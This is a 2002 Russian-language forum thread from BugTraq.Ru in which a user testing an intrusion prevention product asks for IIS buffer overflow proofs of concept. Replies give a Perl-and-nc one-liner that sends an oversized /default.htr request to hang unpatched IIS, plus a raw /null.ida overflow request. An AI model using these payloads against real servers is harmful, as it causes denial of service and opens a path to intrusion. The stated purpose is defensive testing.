BugTraq.Ru: форум / hacking / Взлом IIS через buffer overflow

информационная безопасность
без паники и всерьез

подробно о проекте

Spanning Tree Protocol: недокументированное применение

Анализ криптографических сетевых...

Модель надежности двухузлового...

Специальные марковские модели надежности...

Очередное исследование 19 миллиардов...

Оптимизация ввода-вывода как инструмент...

Зловреды выбирают Lisp и Delphi

bugtraq.ru / форум / hacking

Имя

Пароль

если вы видите этот текст, отключите в настройках форума использование JavaScript


ФОРУМ


	все доски
	FAQ
	IRC
	новые сообщения

	site updates
	guestbook
	beginners
	sysadmin
	programming
	operating systems
	theory
	web building
	software
	hardware
	networking
	law
	hacking
gadgets
job
dnet
humor
miscellaneous
scrap

регистрация

Легенда:

новое сообщение

закрытая нитка

новое сообщение

в закрытой нитке

старое сообщение

Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
Новичкам также крайне полезно ознакомиться с данным документом.

Взлом IIS через buffer overflow 26.12.02 23:02 Число просмотров: 2084
Автор: lem0n Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Пробовал, словила, падла.. На самом деле, просто telnet www.myiis.box 80 и потом:
GET /null.ida? [buffer=240bytes] = X HTTP/1.1
Host: www.worm.com
точно также переполняет буффер.
> попробуй так:
> perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc
> iis.my.net 80
> иис (непатченый) должен зависнуть.

Взлом IIS через buffer overflow 26.12.02 22:23
Автор: lem0n Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Может кто подскажет, гда найти "proof of concept" реального buffer overflow для IIS? Тестирую Host Intrusion Prevention System, которая обещает защитить даже абсолютно "голый" IIS от переполнений баффера, даже в оригрнальной конфигурации с MDAC, scripts, ida/idq/htr ISAPI. Пока единственная программа, которая действительно переполняет буффер и чего-то делает - это Coldenair. Её мой HIPS словил и убил. Хочу попробовать другие.
Если кто знает - заранее благодарен.

З.Ы. Вещи типа Stealth, Satan, Retina и т. п. я уже пробовал - увы, они не проходят для тестирования, так как не пытаются провести само переполнение: быстрый тест и результат, который я знаю и без них - your system is vulnerable.

Взлом IIS через buffer overflow 26.12.02 22:49
Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman

<"чистая" ссылка>

> Может кто подскажет, гда найти "proof of concept" реального
> buffer overflow для IIS? Тестирую Host Intrusion Prevention
> System, которая обещает защитить даже абсолютно "голый" IIS
> от переполнений баффера, даже в оригрнальной конфигурации с
> MDAC, scripts, ida/idq/htr ISAPI. Пока единственная
> программа, которая действительно переполняет буффер и
> чего-то делает - это Coldenair. Её мой HIPS словил и убил.
> Хочу попробовать другие.
> Если кто знает - заранее благодарен.
>

попробуй так:
perl -e 'print "GET /default.htr?"."A"x5000."\n\n" ' | nc iis.my.net 80
иис (непатченый) должен зависнуть.

Взлом IIS через buffer overflow 26.12.02 23:02
Автор: lem0n Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Взлом IIS через buffer overflow 26.12.02 23:55
Автор: NKritsky <Nickolay A. Kritsky> Статус: Elderman

<"чистая" ссылка>

Смотрел http://www.insecure.org/sploits_microshit.html ?
Попробуй - полюбишь! ;-)

Взлом IIS через buffer overflow 27.12.02 17:41
Автор: lem0n Статус: Незарегистрированный пользователь

<"чистая" ссылка>

> Смотрел http://www.insecure.org/sploits_microshit.html ?
> Попробуй - полюбишь! ;-)

Смотрел.. Проблема в том, что там в основном старье для взлома IIS 4.0, а я тестирую на 5.0.
Кстати, вот еще вопрос: есть информация о взломе Base64 encoding алгоритма, использующегося при Base Authentication в IIS? Поискал на Googlе, но ничего толкового не нашел.

Page build time: 0 s

Design: Vadim Derkach